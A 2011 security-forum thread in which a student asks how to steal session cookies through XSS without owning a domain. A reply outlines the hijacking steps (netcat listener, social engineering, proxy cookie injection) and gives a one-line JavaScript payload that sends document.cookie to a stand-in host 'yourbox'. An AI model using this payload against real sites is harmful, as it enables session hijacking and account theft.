XSS snatching cookie without domain

<<

bigapple

Post Thu Aug 18, 2011 1:39 pm

XSS snatching cookie without domain

Okay I'm new to this site so I'm hoping me question doesn't come off as malicious. This is for school, so I'm not trying to do anything evil. Anyways, I was wondering if its possible to snatch a cookie using XSS, and deliver it to an attacker without sending it to an attacker controlled domain. Like if an attacker didn't own a domain, or if the domain was blocked, is there any other method or trick that can be used to recieve the cookie? I can code in Javascript relatively well, so you can talk about Javascript functions, methods etc. And thats encouraged because I'm interested in the coding perspective so please give me your ideas. Thanks.  ;D
<<

cd1zz

Recruiters
Recruiters

Post Thu Aug 18, 2011 2:45 pm

Re: XSS snatching cookie without domain

3 assumptions: 1) the site uses session cookies and 2) there is an xss vulnerability in the application and 3) you can SE someone to open your link or get it to them somehow.

With that said, yes. You can basically take the cookie from the site using javascript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you'd just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and what ever else you need. Does that answer your question?
<<

bigapple

Post Thu Aug 18, 2011 4:31 pm

I thought Javascript code was limited to client-side browser stuff. Can Javascript even make a TCP connection? If it can, then yes that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it but that will work well. Thanks.
<<

cd1zz

Recruiters
Recruiters

Post Thu Aug 18, 2011 4:45 pm

You could use something like document.location.replace("http://yourbox/"+document.cookie+"pagelocation:"+document.location)

which would connect to "yourbox" where your netcat listener is and send you the cookie with the url query string.....

MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xs ... php-shell/
<<

bigapple

Post Fri Aug 19, 2011 6:33 am

Okay, thanks. That answers my question nicely  ;D

Return to Web Applications